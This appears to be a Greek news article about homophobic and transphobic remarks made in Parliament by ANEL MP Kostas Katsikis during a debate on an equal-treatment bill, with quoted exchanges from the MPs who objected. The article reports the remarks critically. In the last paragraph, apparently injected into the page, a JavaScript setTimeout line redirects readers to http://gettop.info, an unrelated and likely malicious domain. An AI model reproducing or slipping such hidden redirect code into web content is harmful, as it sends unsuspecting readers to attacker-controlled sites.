Ομοφοβικό κρεσέντο από βουλευτή των ΑΝΕΛ: Μπορεί γκέι να είναι μπέιμπι-σίτερ;

0
11

 

Σε ένα ακόμα ομοφοβικό παραλήρημα επιδόθηκε από το βήμα της Βουλής, ο βουλευτής των ΑΝΕΛ, Κώστας Κατσίκης, προκαλώντας αντιδράσεις μόνο από την πλευρά της αντιπολίτευσης, ενώ ατάραχοι παρακολουθούσαν οι κυβερνητικοί εταίροι-βουλευτές του ΣΥΡΙΖΑ.

Ο Κώστας Κατσίκης, κατά κατά τη συζήτηση στη Βουλή του νομοσχεδίου για την ενσωμάτωση στο εθνικό δίκαιο κοινοτικής οδηγίας περί εφαρμογής της αρχής της ίσης μεταχείρισης προσώπων ασχέτως φυλετικής καταγωγής ή γενετήσιου προσανατολισμού, ξέσπασε σε ένα νέο ομοφοβικό κρεσέντο λέγοντας: «Γιατί αντικαταστήθηκε ο όρος γενετήσιος προσανατολισμός με τον σεξουαλικό προσανατολισμό. Γιατί ο γενετήσιος σημαίνει ο τρόπος αναπαραγωγής κι αυτός με τον οποίο οφείλει να ζει ένα έλλογο ον, ακολουθώντας τα χρηστά ήθη”. Στην συνέχεια μάλιστα ο βουλευτής των ΑΝΕΛ μίλησε ακόμα και για όρια στο δικαίωμα της “αυτοδιάθεσης”. Για να υποστηρίξει μάλιστα τα λεγόμενα του έφερε το εξής παράδειγμα: “Τι θα συμβεί στην ψυχολογία ενός μικρού παιδιού εάν η δασκάλα του προβεί σε εγχείρηση αλλαγής φύλου και την επόμενη χρονιά εμφανιστεί ως δάσκαλος. Μπορεί ένας τρανσέξουαλ να είναι παιδαγωγός; Μπορεί ένας γκέι να είναι μπέιμπι-σίτερ;».

Οι συγκεκριμένες αναφορές του Κώστα Κατσίκη έφεραν αντιδράσεις από τις πτέρυγες της αντιπολίτευσης, ενώ προκάλεσαν την αντίδραση του βουλευτή της Ένωσης Κεντρώων Μάριου Γεωργιάδη, ο οποίος μίλησε για μεσαιωνικό σκοταδισμό.

Ο διάλογος είναι ενδεικτικός:

Μ. ΓΕΩΡΓΙΑΔΗΣ: Γιατί δεν μπορεί;

Κ. ΚΑΤΣΙΚΗΣ: Το ότι δεν αντιλαμβάνεστε γιατί δεν μπορεί δείχνει το IQ σας. Οι ισορροπίες είναι εξαιρετικά λεπτές. Εμείς πιστοί στη θέση μας θα καταψηφίσουμε και σήμερα παραμένοντας πιστοί στις χριστιανικές μας αντιλήψεις ως Έλληνες πατριώτες και συνεχίζοντας τον αγώνα των αρχών μας.

Γ. ΒΑΡΕΜΕΝΟΣ: (προεδρεύων): κ. Κατσίκη τίθεται ένα θέμα όμως. Θα ζητούν πιστοποιητικό ότι κάποιος δεν είναι γκέι;

Μ. ΓΕΩΡΓΙΑΔΗΣ: Έχεις μείνει στον μεσαίωνα κ. Κατσίκη. Ο κ. Κατσίκης κρίνει προφανώς από το δικό του IQ στο μεσαιωνικό σκοταδισμό που η ίση μεταχείριση δεν μπορεί να είναι δικαίωμα των ανθρώπων. Να ανακαλέσει.

Ο Κώστας Κατσίκης κατέληξε λέγοντας πως οι ΑΝΕΛ πιστοί στις θέσεις τους “θα καταψηφίσουμε και σήμερα τα άρθρα 1, 2, 3, 4 που νομιμοποιούν και ενισχύουν το Σύμφωνο Συμβίωσης”.

Σημειώνεται ότι τη διεξαγωγή ονομαστικής ψηφοφορίας επί των 4 άρθρων με τα οποία διαφωνούν οι ΑΝΕΛ, ζήτησαν το ΠΑΣΟΚ, το Ποτάμι, και ορισμένοι εκ των ανεξαρτήτων βουλευτών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here